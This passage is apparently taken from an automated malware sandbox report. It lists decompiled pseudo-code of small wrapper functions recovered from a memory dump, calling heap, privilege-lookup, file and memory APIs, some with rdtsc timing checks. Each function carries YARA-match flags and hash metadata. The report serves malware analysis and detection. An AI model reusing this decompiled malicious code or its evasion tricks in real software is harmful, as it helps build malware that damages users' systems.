						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                                  0x004088ab
                                                                  0x004088b3
                                                                  0x004088b5
                                                                  0x004088ba
                                                                  0x004088bf
                                                                  0x004088d2
                                                                  0x004088d7
                                                                  0x004088e0
                                                                  0x004088ec
                                                                  0x004088ff
                                                                  0x00408904
                                                                  0x00408907
                                                                  0x00408910
                                                                  0x00408922
                                                                  0x00408927
                                                                  0x0040892c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x0040892e
                                                                  0x00408932
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00408934
                                                                  0x00000000
                                                                  0x00408932
                                                                  0x00408936
                                                                  0x00408939
                                                                  0x0040893f
                                                                  0x00408941
                                                                  0x0040894c
                                                                  0x00408951
                                                                  0x00408954
                                                                  0x00408961
                                                                  0x0040896c
                                                                  0x0040896e
                                                                  0x00408974
                                                                  0x00408978
                                                                  0x0040897b
                                                                  0x0040897b
                                                                  0x00408982
                                                                  0x00408985
                                                                  0x0040898a
                                                                  0x00408997
                                                                  0x004088c6
                                                                  0x004088c6
                                                                  0x004088c6

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                  • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                  • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                  • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004185C6, Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LookupPrivilegeValue
                                                                  • String ID:
                                                                  • API String ID: 3899507212-0
                                                                  • Opcode ID: 8802667e71684f83c9df3fbb6aad369579a760644a9dc3ac885da5b8b12011e1
                                                                  • Instruction ID: 93b8b5ab8f82a1a22bbcf885ce13296a098ad56dfdb60340b6d7a0293f7f8a9f
                                                                  • Opcode Fuzzy Hash: 8802667e71684f83c9df3fbb6aad369579a760644a9dc3ac885da5b8b12011e1
                                                                  • Instruction Fuzzy Hash: 12015BB2200208AFDB14DF59DC85EEB37A9EF89354F058159FA09A7741C934E851CBF5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 82%
                                                                  			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D10( &_v67, 0, 0x3f);
				E0041A8F0( &_v68, 3);
				_t12 = E00409B10(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                  0x00407260
                                                                  0x0040726f
                                                                  0x00407273
                                                                  0x0040727e
                                                                  0x0040728e
                                                                  0x0040729e
                                                                  0x004072a3
                                                                  0x004072aa
                                                                  0x004072ad
                                                                  0x004072ba
                                                                  0x004072be
                                                                  0x004072db
                                                                  0x004072db
                                                                  0x00000000
                                                                  0x004072dd
                                                                  0x004072e2

                                                                  APIs
                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MessagePostThread
                                                                  • String ID:
                                                                  • API String ID: 1836367815-0
                                                                  • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                  • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                  • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                  • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00418611, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 58%
                                                                  			E00418611(intOrPtr __eax, signed int __ebx, void* __ecx, signed int __edi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr _t11;
				int _t14;
				signed int _t22;

				asm("scasd");
				_t22 = __edi ^  *(__ecx + __ebx * 8 - 0xb503176);
				asm("sahf");
				 *0xa5e17839 = __eax;
				asm("andnps xmm1, [ebx+0x8458bec]");
				_t11 = _a4;
				E00418DB0(_t22, _t11, _t11 + 0xc8c,  *((intOrPtr*)(_t11 + 0xa18)), 0, 0x46);
				_t14 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t14;
			}






                                                                  0x00418611
                                                                  0x00418612
                                                                  0x00418619
                                                                  0x0041861a
                                                                  0x0041861f
                                                                  0x00418623
                                                                  0x0041863a
                                                                  0x00418650
                                                                  0x00418654

                                                                  APIs
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LookupPrivilegeValue
                                                                  • String ID:
                                                                  • API String ID: 3899507212-0
                                                                  • Opcode ID: ee1860bb3bde109e6256b65eeda0fa7ea375e128e3bf450474432dc7ea388d5b
                                                                  • Instruction ID: 120ea2e20af07e7a091edccab2c85cef69c88459f6122e74f9dd585d08177c18
                                                                  • Opcode Fuzzy Hash: ee1860bb3bde109e6256b65eeda0fa7ea375e128e3bf450474432dc7ea388d5b
                                                                  • Instruction Fuzzy Hash: 6AE065B1600215ABDB10DF55CC81ED77769EF88354F058199FE085B242CA34A851CBF4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                  0x004184cf
                                                                  0x004184d7
                                                                  0x004184ed
                                                                  0x004184f1

                                                                  APIs
                                                                  • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FreeHeap
                                                                  • String ID:
                                                                  • API String ID: 3298025750-0
                                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                  • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                  • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00418480(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                  0x00418497
                                                                  0x004184ad
                                                                  0x004184b1

                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                  • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                  • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                  • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00418620(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				intOrPtr _t7;
				int _t10;
				void* _t15;

				_t7 = _a4;
				E00418DB0(_t15, _t7, _t7 + 0xc8c,  *((intOrPtr*)(_t7 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}






                                                                  0x00418623
                                                                  0x0041863a
                                                                  0x00418650
                                                                  0x00418654

                                                                  APIs
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LookupPrivilegeValue
                                                                  • String ID:
                                                                  • API String ID: 3899507212-0
                                                                  • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                  • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                  • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                  • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E00418500(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E00418DB0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                  0x00418503
                                                                  0x0041851a
                                                                  0x00418528

                                                                  APIs
                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                  • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                  • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                  • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004184F9, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 68%
                                                                  			E004184F9(intOrPtr _a4, int _a8) {
				void* _t14;

				asm("das");
				_t8 = _a4;
				E00418DB0(_t14, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                  0x004184f9
                                                                  0x00418503
                                                                  0x0041851a
                                                                  0x00418528

                                                                  APIs
                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.389441848.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ExitProcess
                                                                  • String ID:
                                                                  • API String ID: 621844428-0
                                                                  • Opcode ID: e321a194ea789e82e175c895031bd02e0f239fc9f2c4f37c61c054a05093ac46
                                                                  • Instruction ID: 64487abadd3e81e385188be78271e4afcad51d430bfa0e95e9cca55a12b02c85
                                                                  • Opcode Fuzzy Hash: e321a194ea789e82e175c895031bd02e0f239fc9f2c4f37c61c054a05093ac46
                                                                  • Instruction Fuzzy Hash: A6E01775600300BFDB21DF54CD86FD737A8AF4A750F0580A9BA186F391CA34AA00CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Non-executed Functions

                                                                  Analysis Process: cscript.exe PID: 6180 Parent PID: 3440 cscript.exeCOMMON

                                                                  Executed Functions

                                                                  Function 031281AA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,03123B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03123B87,007A002E,00000000,00000060,00000000,00000000), ref: 031281FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID: .z`
                                                                  • API String ID: 823142352-1441809116
                                                                  • Opcode ID: beb90424da473b2c1e71ed92e4d489b7933dce79bc4dbf3d874c3b35418d8124
                                                                  • Instruction ID: 7c7318dc86b91afcb4e4f6ab4e54def22adb04958391f004c01433f24fe94755
                                                                  • Opcode Fuzzy Hash: beb90424da473b2c1e71ed92e4d489b7933dce79bc4dbf3d874c3b35418d8124
                                                                  • Instruction Fuzzy Hash: FC01B2B6205108AFCB08CF98DC94EEB7BA9AF8C354F158248FA4DD7241D630E811CBA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 031281B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,03123B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,03123B87,007A002E,00000000,00000060,00000000,00000000), ref: 031281FD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID: .z`
                                                                  • API String ID: 823142352-1441809116
                                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                  • Instruction ID: de59a6cf933a55d8ff7cd6a48273ac074487f82fb9fe8d11710a173d6891a7b9
                                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                  • Instruction Fuzzy Hash: AFF0B2B2200208ABCB08CF88DC84EEB77ADAF8C754F158248BA0D97240D630E8118BA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03128260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtReadFile.NTDLL(03123D42,5E972F59,FFFFFFFF,03123A01,?,?,03123D42,?,03123A01,FFFFFFFF,5E972F59,03123D42,?,00000000), ref: 031282A5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                  • Instruction ID: 5e41e3d7b87040083ae9cc9c2036b7d78fe309052be7f19749dd582e0528f81e
                                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                  • Instruction Fuzzy Hash: F9F0A4B6200208ABCB14DF89DC80EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 03128390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,03112D11,00002000,00003000,00000004), ref: 031283C9
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateMemoryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2167126740-0
                                                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                  • Instruction ID: eb090cd60add1b80fb878c05dfb11e1e56022b5c73272f55afcfd5a16de4954c
                                                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                  • Instruction Fuzzy Hash: 33F015B6200218ABCB14DF89CC80EEB77ADAF8C650F118148BE0897241C630F810CBE0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 031282E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtClose.NTDLL(03123D20,?,?,03123D20,00000000,FFFFFFFF), ref: 03128305
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.592938762.0000000003110000.00000040.00000001.sdmp, Offset: 03110000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                  • Instruction ID: d543f9a72770bd2086e45f55724ec8476b55eb187e4875791ec011c6d7176cda
                                                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                  • Instruction Fuzzy Hash: 2ED012762003146BD710EF98CC45ED77B5CEF48650F154455BA185B241D530F91086E0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04979840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: ac6bd2ed34f208f91e02c3368f6ed55605402c28d60acc05f29e5c47f5e6f32b
                                                                  • Instruction ID: d77176a1f726dad3128b703f1999be83beff015e3dedf6ec7ae49ddea31c450a
                                                                  • Opcode Fuzzy Hash: ac6bd2ed34f208f91e02c3368f6ed55605402c28d60acc05f29e5c47f5e6f32b
                                                                  • Instruction Fuzzy Hash: 61900261242141527545B15D84049074046A7F0285791C126E1405954C8566E856E661
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04979860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 89a1a2e84caff5907cc4791cd67bfa10bc0846333bdddbd146f21f9aa940a657
                                                                  • Instruction ID: 34b01b60f06435f5db6e12cc14790498a077ba7d417dddb45d64d72ad22df1c4
                                                                  • Opcode Fuzzy Hash: 89a1a2e84caff5907cc4791cd67bfa10bc0846333bdddbd146f21f9aa940a657
                                                                  • Instruction Fuzzy Hash: 4490027120110413F111715D8504B07004997E0285F91C526E041555CD9696D952B161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049799A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 15170992d0e2890176ba91048d925dbc78b80e9152fec7d58c474db6e9f5697f
                                                                  • Instruction ID: ab7002c18abbfcd0b280ab049ef9f224e8c7ad025e8e1a9c9394c47c9cb64df4
                                                                  • Opcode Fuzzy Hash: 15170992d0e2890176ba91048d925dbc78b80e9152fec7d58c474db6e9f5697f
                                                                  • Instruction Fuzzy Hash: C59002A134110442F100715D8414F060045D7F1345F51C129E1055558D8659DC527166
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049795D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: dc89ed33c18e3fc283f5f35c0848319f9634b75cf6809c561a87b49c9f9ed1e5
                                                                  • Instruction ID: d17838c0b5a063b23e3d78b59620d3de5d3a258a2c3d55a31d5e6546837713a2
                                                                  • Opcode Fuzzy Hash: dc89ed33c18e3fc283f5f35c0848319f9634b75cf6809c561a87b49c9f9ed1e5
                                                                  • Instruction Fuzzy Hash: F39002A1202100036105715D8414A16404A97F0245B51C135E1005594DC565D8917165
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04979910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 4b5fa6c56669382826e81670274b578475212ae81884062bfc09d87215281e3f
                                                                  • Instruction ID: 0a03cfb5d3707bdf8d712ce00f84ee0aa3b6e02caa86d42a6f7d63ecf54d5671
                                                                  • Opcode Fuzzy Hash: 4b5fa6c56669382826e81670274b578475212ae81884062bfc09d87215281e3f
                                                                  • Instruction Fuzzy Hash: 3C9002B120110402F140715D8404B46004597E0345F51C125E5055558E8699DDD576A5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04979540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 2dffc15933e4e365b1ea28392817a0d581fead87959c6a1392c8984b0d7da5b3
                                                                  • Instruction ID: 64bfd150ed9437774da4191b3dc0768130bdf2a29fa0e36a4dd3af3275c50373
                                                                  • Opcode Fuzzy Hash: 2dffc15933e4e365b1ea28392817a0d581fead87959c6a1392c8984b0d7da5b3
                                                                  • Instruction Fuzzy Hash: CC900265211100032105B55D4704907008697E5395351C135F1006554CD661D8616161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049796D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: be16bad20e5fc1ebd38b538a6d9969d73438f64636f54906bca5a6407bde39fb
                                                                  • Instruction ID: d0a3a6a6cf73dd7adc09165e5ab03e1f5800e50328b9dc14b6405d16f0648309
                                                                  • Opcode Fuzzy Hash: be16bad20e5fc1ebd38b538a6d9969d73438f64636f54906bca5a6407bde39fb
                                                                  • Instruction Fuzzy Hash: 7090027120110842F100715D8404F46004597F0345F51C12AE0115658D8655D8517561
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
